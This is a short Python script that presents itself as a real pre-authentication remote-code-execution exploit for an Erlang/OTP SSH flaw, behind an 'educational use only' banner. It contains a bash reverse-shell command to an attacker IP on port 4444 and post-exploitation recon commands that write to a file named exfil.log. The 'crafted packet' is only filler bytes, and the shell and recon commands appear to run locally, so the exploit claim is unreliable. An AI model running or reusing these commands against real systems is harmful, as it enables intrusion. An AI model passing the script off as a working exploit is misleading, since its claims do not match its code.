# --------------------------------------------------------------------------------------- # WARNING: This is a real exploit. It can trigger remote code execution (RCE). # # CVE: CVE-2025-32433 - Erlang/OTP SSH Pre-authentication RCE # # Use this script ONLY in environments where you have **explicit written permission**. # Unauthorized use against public networks may be illegal and unethical. # # This script is provided for educational and research purposes only. # The authors are not responsible for misuse or damage caused by this tool. # --------------------------------------------------------------------------------------- #!/usr/bin/env python3 import socket import time import os # Lab IPs target_ip = "192.168.1.100" attacker_ip = "192.168.1.1" attacker_port = 4444 def build_ssh_version(): return b'SSH-2.0-ErlangTest_0.1\r\n' def build_crafted_packet(): return b"\x00\x00\x00\x10" + b"\x41" * 16 def trigger_reverse_shell(): print(f"[+] Triggering reverse shell to {attacker_ip}:{attacker_port}") os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'") def simulate_post_exploitation(): print("[+] Simulating post-exploitation behavior...") # Command 1: whoami os.system("whoami >> /tmp/exfil.log") # Command 2: system info os.system("uname -a >> /tmp/exfil.log") # Command 3: show directory structure os.system("ls -alh /home/ >> /tmp/exfil.log") # Command 4: dummy file access with open("/tmp/exfil.log", "a") as f: f.write("\n[+] Simulated exfil of dummy credentials...\n") f.write("username: admin\npassword: hunter2\n") print("[+] Post-exploitation simulation written to /tmp/exfil.log") def send_exploit(): print(f"[+] Connecting to target {target_ip}:22...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, 22)) sock.sendall(build_ssh_version()) print(f"[+] Sent SSH version string") time.sleep(0.5) sock.sendall(build_crafted_packet()) print(f"[+] Sent crafted SSH pre-auth packet") time.sleep(0.5) sock.close() # Simulate reverse shell and post-exploit activity trigger_reverse_shell() time.sleep(1) simulate_post_exploitation() if __name__ == "__main__": send_exploit()